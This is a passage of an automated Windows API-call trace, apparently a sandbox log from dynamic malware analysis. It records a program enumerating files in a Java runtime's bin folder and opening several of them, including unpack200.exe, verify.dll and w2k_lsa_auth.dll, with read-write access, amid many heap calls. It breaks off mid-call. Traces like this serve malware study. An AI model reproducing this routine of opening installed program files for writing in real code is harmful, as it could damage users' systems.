1 [0094.157] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.157] CloseHandle (hObject=0x360) returned 1 [0094.157] AreFileApisANSI () returned 1 [0094.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75fa8 [0094.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 53 [0094.157] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.158] GetFileType (hFile=0x360) returned 0x1 [0094.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0094.158] CloseHandle (hObject=0x360) returned 1 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.159] AreFileApisANSI () returned 1 [0094.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75f30 [0094.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75f30, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 53 [0094.159] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x30240)) returned 1 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0094.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.159] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="verify.dll", cAlternateFileName="")) returned 1 [0094.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0094.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0094.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0094.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0094.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0094.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0094.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0094.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0094.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0094.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0094.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0094.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0094.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.160] AreFileApisANSI () returned 1 [0094.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll", lpUsedDefaultChar=0x0) returned 50 [0094.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0094.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0094.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0094.160] AreFileApisANSI () returned 1 [0094.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0094.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46a58 [0094.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 50 [0094.160] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.161] GetFileType (hFile=0x360) returned 0x1 [0094.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0094.161] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.161] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.161] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.161] CloseHandle (hObject=0x360) returned 1 [0094.161] AreFileApisANSI () returned 1 [0094.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0094.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x460b8 [0094.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 50 [0094.162] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.162] GetFileType (hFile=0x360) returned 0x1 [0094.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0094.162] CloseHandle (hObject=0x360) returned 1 [0094.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.163] AreFileApisANSI () returned 1 [0094.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0094.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x460b8 [0094.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 50 [0094.163] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc040)) returned 1 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0094.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.163] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5e40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="w2k_lsa_auth.dll", cAlternateFileName="W2K_LS~1.DLL")) returned 1 [0094.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0094.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0094.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0094.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0094.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0094.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0094.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0094.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0094.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0094.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0094.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0094.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0094.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0094.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0094.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a5b0 [0094.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0094.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0094.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0094.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0094.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0094.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0094.164] AreFileApisANSI () returned 1 [0094.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll", lpUsedDefaultChar=0x0) returned 56 [0094.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0094.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0094.164] AreFileApisANSI () returned 1 [0094.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0094.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0094.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll") returned 56 [0094.165] CreateFileW (lpFileName="C:\\Program 